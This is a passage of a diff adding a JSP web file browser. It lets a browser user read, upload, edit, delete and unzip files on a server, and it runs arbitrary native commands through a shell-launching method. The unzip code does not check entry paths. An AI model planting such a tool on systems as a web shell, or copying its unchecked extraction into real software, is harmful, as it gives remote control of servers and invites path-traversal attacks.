null"); + int index = fileName.lastIndexOf('/'); + String name = null; + if (index >= 0) name = fileName.substring(index + 1); + else name = fileName; + index = name.lastIndexOf('\\'); + if (index >= 0) fileName = name.substring(index + 1); + path = dir + File.separator + fileName; + if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); + else return path.replace('/', File.separatorChar); + } + } //End of class HttpMultiPartParser + + /** + * This class is a comparator to sort the filenames and dirs + */ + class FileComp implements Comparator { + + int mode; + int sign; + + FileComp() { + this.mode = 1; + this.sign = 1; + } + + /** + * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type + * The default sorting method is by Name + * Negative mode means descending sort + */ + FileComp(int mode) { + if (mode < 0) { + this.mode = -mode; + sign = -1; + } + else { + this.mode = mode; + this.sign = 1; + } + } + + public int compare(Object o1, Object o2) { + File f1 = (File) o1; + File f2 = (File) o2; + if (f1.isDirectory()) { + if (f2.isDirectory()) { + switch (mode) { + //Filename or Type + case 1: + case 4: + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + //Filesize + case 2: + return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); + //Date + case 3: + return sign + * (new Long(f1.lastModified()) + .compareTo(new Long(f2.lastModified()))); + default: + return 1; + } + } + else return -1; + } + else if (f2.isDirectory()) return 1; + else { + switch (mode) { + case 1: + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + case 2: + return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); + case 3: + return sign + * (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified()))); + case 4: { // Sort by extension + int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.'); + int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.'); + if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + } + // f1 has no extension + else if (tempIndexf1 == -1) return -sign; + // f2 has no extension + else if (tempIndexf2 == -1) return sign; + // Both have an extension + else { + String tempEndf1 = f1.getAbsolutePath().toUpperCase() + .substring(tempIndexf1); + String tempEndf2 = f2.getAbsolutePath().toUpperCase() + .substring(tempIndexf2); + return sign * tempEndf1.compareTo(tempEndf2); + } + } + default: + return 1; + } + } + } + } + + /** + * Wrapperclass to wrap an OutputStream around a Writer + */ + class Writer2Stream extends OutputStream { + + Writer out; + + Writer2Stream(Writer w) { + super(); + out = w; + } + + public void write(int i) throws IOException { + out.write(i); + } + + public void write(byte[] b) throws IOException { + for (int i = 0; i < b.length; i++) { + int n = b[i]; + //Convert byte to ubyte + n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); + out.write(n); + } + } + + public void write(byte[] b, int off, int len) throws IOException { + for (int i = off; i < off + len; i++) { + int n = b[i]; + n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); + out.write(n); + } + } + } //End of class Writer2Stream + + static Vector expandFileList(String[] files, boolean inclDirs) { + Vector v = new Vector(); + if (files == null) return v; + for (int i = 0; i < files.length; i++) + v.add(new File(URLDecoder.decode(files[i]))); + for (int i = 0; i < v.size(); i++) { + File f = (File) v.get(i); + if (f.isDirectory()) { + File[] fs = f.listFiles(); + for (int n = 0; n < fs.length; n++) + v.add(fs[n]); + if (!inclDirs) { + v.remove(i); + i--; + } + } + } + return v; + } + + /** + * Method to build an absolute path + * @param dir the root dir + * @param name the name of the new directory + * @return if name is an absolute directory, returns name, else returns dir+name + */ + static String getDir(String dir, String name) { + if (!dir.endsWith(File.separator)) dir = dir + File.separator; + File mv = new File(name); + String new_dir = null; + if (!mv.isAbsolute()) { + new_dir = dir + name; + } + else new_dir = name; + return new_dir; + } + + /** + * This Method converts a byte size in a kbytes or Mbytes size, depending on the size + * @param size The size in bytes + * @return String with size and unit + */ + static String convertFileSize(long size) { + int divisor = 1; + String unit = "bytes"; + if (size >= 1024 * 1024) { + divisor = 1024 * 1024; + unit = "MB"; + } + else if (size >= 1024) { + divisor = 1024; + unit = "KB"; + } + if (divisor == 1) return size / divisor + " " + unit; + String aftercomma = "" + 100 * (size % divisor) / divisor; + if (aftercomma.length() == 1) aftercomma = "0" + aftercomma; + return size / divisor + "." + aftercomma + " " + unit; + } + + /** + * Copies all data from in to out + * @param in the input stream + * @param out the output stream + * @param buffer copy buffer + */ + static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException { + copyStreamsWithoutClose(in, out, buffer); + in.close(); + out.close(); + } + + /** + * Copies all data from in to out + * @param in the input stream + * @param out the output stream + * @param buffer copy buffer + */ + static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer) + throws IOException { + int b; + while ((b = in.read(buffer)) != -1) + out.write(buffer, 0, b); + } + + /** + * Returns the Mime Type of the file, depending on the extension of the filename + */ + static String getMimeType(String fName) { + fName = fName.toLowerCase(); + if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg"; + else if (fName.endsWith(".gif")) return "image/gif"; + else if (fName.endsWith(".pdf")) return "application/pdf"; + else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html"; + else if (fName.endsWith(".avi")) return "video/x-msvideo"; + else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime"; + else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg"; + else if (fName.endsWith(".zip")) return "application/zip"; + else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff"; + else if (fName.endsWith(".rtf")) return "application/rtf"; + else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi"; + else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv") + || fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt") + || fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel"; + else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword"; + else if (fName.endsWith(".png")) return "image/png"; + else if (fName.endsWith(".xml")) return "text/xml"; + else if (fName.endsWith(".svg")) return "image/svg+xml"; + else if (fName.endsWith(".mp3")) return "audio/mp3"; + else if (fName.endsWith(".ogg")) return "audio/ogg"; + else return "text/plain"; + } + + /** + * Converts some important chars (int) to the corresponding html string + */ + static String conv2Html(int i) { + if (i == '&') return "&"; + else if (i == '<') return "<"; + else if (i == '>') return ">"; + else if (i == '"') return """; + else return "" + (char) i; + } + + /** + * Converts a normal string to a html conform string + */ + static String conv2Html(String st) { + StringBuffer buf = new StringBuffer(); + for (int i = 0; i < st.length(); i++) { + buf.append(conv2Html(st.charAt(i))); + } + return buf.toString(); + } + + /** + * Starts a native process on the server + * @param command the command to start the process + * @param dir the dir in which the process starts + */ + static String startProcess(String command, String dir) throws IOException { + StringBuffer ret = new StringBuffer(); + String[] comm = new String[3]; + comm[0] = COMMAND_INTERPRETER[0]; + comm[1] = COMMAND_INTERPRETER[1]; + comm[2] = command; + long start = System.currentTimeMillis(); + try { + //Start process + Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir)); + //Get input and error streams + BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream()); + BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream()); + boolean end = false; + while (!end) { + int c = 0; + while ((ls_err.available() > 0) && (++c <= 1000)) { + ret.append(conv2Html(ls_err.read())); + } + c = 0; + while ((ls_in.available() > 0) && (++c <= 1000)) { + ret.append(conv2Html(ls_in.read())); + } + try { + ls_proc.exitValue(); + //if the process has not finished, an exception is thrown + //else + while (ls_err.available() > 0) + ret.append(conv2Html(ls_err.read())); + while (ls_in.available() > 0) + ret.append(conv2Html(ls_in.read())); + end = true; + } + catch (IllegalThreadStateException ex) { + //Process is running + } + //The process is not allowed to run longer than given time. + if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) { + ls_proc.destroy(); + end = true; + ret.append("!!!! Process has timed out, destroyed !!!!!"); + } + try { + Thread.sleep(50); + } + catch (InterruptedException ie) {} + } + } + catch (IOException e) { + ret.append("Error: " + e); + } + return ret.toString(); + } + + /** + * Converts a dir string to a linked dir string + * @param dir the directory string (e.g. /usr/local/httpd) + * @param browserLink web-path to Browser.jsp + */ + static String dir2linkdir(String dir, String browserLink, int sortMode) { + File f = new File(dir); + StringBuffer buf = new StringBuffer(); + while (f.getParentFile() != null) { + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getName()) + File.separator + ""); + } + else buf.insert(0, conv2Html(f.getName()) + File.separator); + f = f.getParentFile(); + } + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + ""); + } + else buf.insert(0, f.getAbsolutePath()); + return buf.toString(); + } + + /** + * Returns true if the given filename tends towards a packed file + */ + static boolean isPacked(String name, boolean gz) { + return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar") + || (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase() + .endsWith(".war")); + } + + /** + * If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not + */ + static boolean isAllowed(File path, boolean write) throws IOException{ + if (READ_ONLY && write) return false; + if (RESTRICT_BROWSING) { + StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";"); + while (stk.hasMoreTokens()){ + if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken())) + return RESTRICT_WHITELIST; + } + return !RESTRICT_WHITELIST; + } + else return true; + } + + //--------------------------------------------------------------------------------------------------------------- + + %> +<% + //Get the current browsing directory + request.setAttribute("dir", request.getParameter("dir")); + // The browser_name variable is used to keep track of the URI + // of the jsp file itself. It is used in all link-backs. + final String browser_name = request.getRequestURI(); + final String FOL_IMG = ""; + boolean nohtml = false; + boolean dir_view = true; + //Get Javascript + if (request.getParameter("Javascript") != null) { + dir_view = false; + nohtml = true; + //Tell the browser that it should cache the javascript + response.setHeader("Cache-Control", "public"); + Date now = new Date(); + SimpleDateFormat sdf = new SimpleDateFormat("EEE, d MMM yyyy HH:mm:ss z", Locale.US); + response.setHeader("Expires", sdf.format(new Date(now.getTime() + 1000 * 60 * 60 * 24*2))); + response.setHeader("Content-Type", "text/javascript"); + %> + <%// This section contains the Javascript used for interface elements %> + var check = false; + <%// Disables the checkbox feature %> + function dis(){check = true;} + + var DOM = 0, MS = 0, OP = 0, b = 0; + <%// Determine the browser type %> + function CheckBrowser(){ + if (b == 0){ + if (window.opera) OP = 1; + // Moz or Netscape + if(document.getElementById) DOM = 1; + // Micro$oft + if(document.all && !OP) MS = 1; + b = 1; + } + } + <%// Allows the whole row to be selected %> + function selrow (element, i){ + var erst; + CheckBrowser(); + if ((OP==1)||(MS==1)) erst = element.firstChild.firstChild; + else if (DOM==1) erst = element.firstChild.nextSibling.firstChild; + <%// MouseIn %> + if (i==0){ + if (erst.checked == true) element.className='mousechecked'; + else element.className='mousein'; + } + <%// MouseOut %> + else if (i==1){ + if (erst.checked == true) element.className='checked'; + else element.className='mouseout'; + } + <% // MouseClick %> + else if ((i==2)&&(!check)){ + if (erst.checked==true) element.className='mousein'; + else element.className='mousechecked'; + erst.click(); + } + else check=false; + } + <%// Filter files and dirs in FileList%> + function filter (begriff){ + var suche = begriff.value.toLowerCase(); + var table = document.getElementById("filetable"); + var ele; + for (var r = 1; r < table.rows.length; r++){ + ele = table.rows[r].cells[1].innerHTML.replace(/<[^>]+>/g,""); + if (ele.toLowerCase().indexOf(suche)>=0 ) + table.rows[r].style.display = ''; + else table.rows[r].style.display = 'none'; + } + } + <%//(De)select all checkboxes%> + function AllFiles(){ + for(var x=0;x < document.FileList.elements.length;x++){ + var y = document.FileList.elements[x]; + var ytr = y.parentNode.parentNode; + var check = document.FileList.selall.checked; + if(y.name == 'selfile' && ytr.style.display != 'none'){ + if (y.disabled != true){ + y.checked = check; + if (y.checked == true) ytr.className = 'checked'; + else ytr.className = 'mouseout'; + } + } + } + } + + function shortKeyHandler(_event){ + if (!_event) _event = window.event; + if (_event.which) { + keycode = _event.which; + } else if (_event.keyCode) { + keycode = _event.keyCode; + } + var t = document.getElementById("text_Dir"); + //z + if (keycode == 122){ + document.getElementById("but_Zip").click(); + } + //r, F2 + else if (keycode == 113 || keycode == 114){ + var path = prompt("Please enter new filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Ren").click(); + } + //c + else if (keycode == 99){ + var path = prompt("Please enter filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NFi").click(); + } + //d + else if (keycode == 100){ + var path = prompt("Please enter directory name", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NDi").click(); + } + //m + else if (keycode == 109){ + var path = prompt("Please enter move destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Mov").click(); + } + //y + else if (keycode == 121){ + var path = prompt("Please enter copy destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Cop").click(); + } + //l + else if (keycode == 108){ + document.getElementById("but_Lau").click(); + } + //Del + else if (keycode == 46){ + document.getElementById("but_Del").click(); + } + } + + function popUp(URL){ + fname = document.getElementsByName("myFile")[0].value; + if (fname != "") + window.open(URL+"?first&uplMonitor="+encodeURIComponent(fname),"","width=400,height=150,resizable=yes,depend=yes") + } + + document.onkeypress = shortKeyHandler; +<% } + // View file + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)) { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath()); + } + else if (f.exists() && f.canRead()) { + if (isPacked(f.getName(), false)) { + //If zipFile, do nothing here + } + else{ + String mimeType = getMimeType(f.getName()); + response.setContentType(mimeType); + if (mimeType.equals("text/plain")) response.setHeader( + "Content-Disposition", "inline;filename=\"temp.txt\""); + else response.setHeader("Content-Disposition", "inline;filename=\"" + + f.getName() + "\""); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + } + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + // Download selected files as zip file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(SAVE_AS_ZIP))) { + Vector v = expandFileList(request.getParameterValues("selfile"), false); + //Check if all files in vector are allowed + String notAllowedFile = null; + for (int i = 0;i < v.size(); i++){ + File f = (File) v.get(i); + if (!isAllowed(f, false)){ + notAllowedFile = f.getAbsolutePath(); + break; + } + } + if (notAllowedFile != null){ + request.setAttribute("error", "You are not allowed to access " + notAllowedFile); + } + else if (v.size() == 0) { + request.setAttribute("error", "No files selected"); + } + else { + File dir_file = new File("" + request.getAttribute("dir")); + int dir_l = dir_file.getAbsolutePath().length(); + response.setContentType("application/zip"); + response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\""); + out.clearBuffer(); + ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out)); + zipout.setComment("Created by jsp File Browser v. " + VERSION_NR); + zipout.setLevel(COMPRESSION_LEVEL); + for (int i = 0; i < v.size(); i++) { + File f = (File) v.get(i); + if (f.canRead()) { + zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1))); + BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[0xffff]; + copyStreamsWithoutClose(fr, zipout, buffer); + /* int b; + while ((b=fr.read())!=-1) zipout.write(b);*/ + fr.close(); + zipout.closeEntry(); + } + } + zipout.finish(); + out.flush(); + nohtml = true; + dir_view = false; + } + } + // Download file + else if (request.getParameter("downfile") != null) { + String filePath = request.getParameter("downfile"); + File f = new File(filePath); + if (!isAllowed(f, false)){ + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile()); + } + else if (f.exists() && f.canRead()) { + response.setContentType("application/octet-stream"); + response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName() + + "\""); + response.setContentLength((int) f.length()); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + if (nohtml) return; + //else + // If no parameter is submitted, it will take the path from jsp file browser + if (request.getAttribute("dir") == null) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) { + File f = new File(application.getRealPath(request.getRequestURI())).getParentFile(); + //This is a hack needed for tomcat + while (f != null && !f.exists()) + f = f.getParentFile(); + if (f != null) + path = f.getAbsolutePath(); + } + if (path == null) { // handle the case where we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + } + //Check path + if (!isAllowed(new File(path), false)){ + //TODO Blacklist + if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH; + else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";")); + } + request.setAttribute("dir", path); + }%> + + + + + + + +<% + //If a cssfile exists, it will take it + String cssPath = null; + if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File( + application.getRealPath(request.getRequestURI())).getParent() + + File.separator + CSS_NAME; + if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString(); + if (new File(cssPath).exists()) { +%> + + <%} + else if (request.getParameter("uplMonitor") == null) {%> + + <%} + + //Check path + if (!isAllowed(new File((String)request.getAttribute("dir")), false)){ + request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir")); + } + //Upload monitor + else if (request.getParameter("uplMonitor") != null) {%> + <% + String fname = request.getParameter("uplMonitor"); + //First opening + boolean first = false; + if (request.getParameter("first") != null) first = true; + UplInfo info = new UplInfo(); + if (!first) { + info = UploadMonitor.getInfo(fname); + if (info == null) { + //Windows + int posi = fname.lastIndexOf("\\"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + if (info == null) { + //Unix + int posi = fname.lastIndexOf("/"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + } + dir_view = false; + request.setAttribute("dir", null); + if (info.aborted) { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

    +Upload aborted. +<% + } + else if (info.totalSize != info.currSize || info.currSize == 0) { + %> + + + +Upload of <%=fname%>

    +
    + + +
    +<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%> +(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
    +Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%> + +<% + } + else { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

    +Upload finished. + +<% + } + } + //Comandwindow + else if (request.getParameter("command") != null) { + if (!NATIVE_COMMANDS){ + request.setAttribute("error", "Execution of native commands is not allowed!"); + } + else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) { +%> +Launch commands in <%=request.getAttribute("dir")%> + +
    +

    <%=LAUNCH_COMMAND %>


    +<% + out.println("
    \n" + + " + "> +

    + + + +
    + Command: +
    + "> +
    +
    +
    +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    +
    + + +<% + dir_view = false; + request.setAttribute("dir", null); + } + } + + //Click on a filename, special viewer (zip+jar file) + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + else if (isPacked(f.getName(), false)) { + //ZipFile + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); +%> +<%= f.getAbsolutePath()%> + + +

    Content of <%=conv2Html(f.getName())%>


    + + +<% + long size = 0; + int fileCount = 0; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory()) { + fileCount++; + size += entry.getSize(); + long ratio = 0; + if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100) + / entry.getSize(); + out.println("" + conv2Html(entry.getName()) + + ""); + + } + } + zf.close(); + //No directory view + dir_view = false; + request.setAttribute("dir", null); +%> +
    NameUncompressed sizeCompressed sizeCompr. ratioDate
    " + convertFileSize(entry.getSize()) + "" + + convertFileSize(entry.getCompressedSize()) + "" + + ratio + "%" + "" + + dateFormat.format(new Date(entry.getTime())) + "
    +

    + <%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>% +

    + +<% + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot read " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: " + + ex); + } + } + } + // Upload + else if ((request.getContentType() != null) + && (request.getContentType().toLowerCase().startsWith("multipart"))) { + if (!ALLOW_UPLOAD){ + request.setAttribute("error", "Upload is forbidden!"); + } + response.setContentType("text/html"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + boolean error = false; + try { + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser + .processData(request.getInputStream(), bound, tempdir, clength); + if (!isAllowed(new File((String)ht.get("dir")), false)){ + //This is a hack, cos we are writing to this directory + request.setAttribute("error", "You are not allowed to access " + ht.get("dir")); + error = true; + } + else if (ht.get("myFile") != null) { + FileInfo fi = (FileInfo) ht.get("myFile"); + File f = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) { + f.delete(); + request.setAttribute("error", "Upload aborted"); + } + else { + // Move file from temp to the right dir + String path = (String) ht.get("dir"); + if (!path.endsWith(File.separator)) path = path + File.separator; + if (!f.renameTo(new File(path + f.getName()))) { + request.setAttribute("error", "Cannot upload file."); + error = true; + f.delete(); + } + } + } + else { + request.setAttribute("error", "No file selected for upload"); + error = true; + } + request.setAttribute("dir", (String) ht.get("dir")); + } + catch (Exception e) { + request.setAttribute("error", "Error " + e + ". Upload aborted"); + error = true; + } + if (!error) request.setAttribute("message", "File upload correctly finished."); + } + // The form to edit a text file + else if (request.getParameter("editfile") != null) { + File ef = new File(request.getParameter("editfile")); + if (!isAllowed(ef, true)){ + request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath()); + } + else{ +%> +Edit <%=conv2Html(request.getParameter("editfile"))%> + + +
    +

    Edit <%=conv2Html(request.getParameter("editfile"))%>


    +<% + BufferedReader reader = new BufferedReader(new FileReader(ef)); + String disable = ""; + if (!ef.canWrite()) disable = " readonly"; + out.println("
    \n" + + "

    + + "> + "> + + + + + + + +
    >Ms-Dos/Windows + >Unix + Write backup
    +
    + + "> + "> +
    +
    +
    +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    + + +<% + } + } + // Save or cancel the edited file + else if (request.getParameter("nfile") != null) { + File f = new File(request.getParameter("nfile")); + if (request.getParameter("Submit").equals("Save")) { + File new_f = new File(getDir(f.getParent(), request.getParameter("new_name"))); + if (!isAllowed(new_f, true)){ + request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath()); + } + if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) { + File bak = new File(new_f.getAbsolutePath() + ".bak"); + bak.delete(); + new_f.renameTo(bak); + } + if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error", + "Cannot write to " + new_f.getName() + ", file is write protected."); + else { + BufferedWriter outs = new BufferedWriter(new FileWriter(new_f)); + StringReader text = new StringReader(request.getParameter("text")); + int i; + boolean cr = false; + String lineend = "\n"; + if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n"; + while ((i = text.read()) >= 0) { + if (i == '\r') cr = true; + else if (i == '\n') { + outs.write(lineend); + cr = false; + } + else if (cr) { + outs.write(lineend); + cr = false; + } + else { + outs.write(i); + cr = false; + } + } + outs.flush(); + outs.close(); + } + } + request.setAttribute("dir", f.getParent()); + } + //Unpack file to the current directory without overwriting + else if (request.getParameter("unpackfile") != null) { + File f = new File(request.getParameter("unpackfile")); + String root = f.getParent(); + request.setAttribute("dir", root); + if (!isAllowed(new File(root), true)){ + request.setAttribute("error", "You are not allowed to access " + root); + } + //Check if file exists + else if (!f.exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", file does not exist"); + } + //Check if directory is readonly + else if (!f.getParentFile().canWrite()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", directory is write protected."); + } + //GZip + else if (f.getName().toLowerCase().endsWith(".gz")) { + //New name is old Name without .gz + String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3); + try { + byte buffer[] = new byte[0xffff]; + copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream( + newName), buffer); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + //Else try Zip + else { + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); + //First check whether a file already exist + boolean error = false; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory() + && new File(root + File.separator + entry.getName()).exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", File " + entry.getName() + " already exists."); + error = true; + break; + } + } + if (!error) { + //Unpack File + entries = zf.entries(); + byte buffer[] = new byte[0xffff]; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + File n = new File(root + File.separator + entry.getName()); + if (entry.isDirectory()) n.mkdirs(); + else { + n.getParentFile().mkdirs(); + n.createNewFile(); + copyStreams(zf.getInputStream(entry), new FileOutputStream(n), + buffer); + } + } + zf.close(); + request.setAttribute("message", "Unpack of " + f.getName() + + " was successful."); + } + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + } + // Delete Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(DELETE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + boolean error = false; + //delete backwards + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + if (!f.canWrite() || !f.delete()) { + request.setAttribute("error", "Cannot delete " + f.getAbsolutePath() + + ". Deletion aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted"); + else if (!error) request.setAttribute("error", "No files selected"); + } + // Create Directory + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_DIR))) { + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else if (new File(new_dir).mkdirs()) { + request.setAttribute("message", "Directory created"); + } + else request.setAttribute("error", "Creation of directory " + new_dir + " failed"); + } + // Create a new empty file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_FILE))) { + String dir = "" + request.getAttribute("dir"); + String file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // Test, if file_name is empty + else if (!"".equals(file_name.trim()) && !file_name.endsWith(File.separator)) { + if (new File(new_file).createNewFile()) request.setAttribute("message", + "File created"); + else request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("error", "Error: " + file_name + " is not a valid filename"); + } + // Rename a file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(RENAME_FILE))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String new_file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, new_file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // The error conditions: + // 1) Zero Files selected + else if (v.size() <= 0) request.setAttribute("error", + "Select exactly one file or folder. Rename failed"); + // 2a) Multiple files selected and the first isn't a dir + // Here we assume that expandFileList builds v from top-bottom, starting with the dirs + else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute( + "error", "Select exactly one file or folder. Rename failed"); + // 2b) If there are multiple files from the same directory, rename fails + else if ((v.size() > 1) && ((File) v.get(0)).isDirectory() + && !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) { + request.setAttribute("error", "Select exactly one file or folder. Rename failed"); + } + else { + File f = (File) v.get(0); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + // Test, if file_name is empty + else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) { + if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) { + request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("message", "Renamed file " + + ((File) v.get(0)).getName() + " to " + new_file); + } + else request.setAttribute("error", "Error: \"" + new_file_name + + "\" is not a valid filename"); + } + } + // 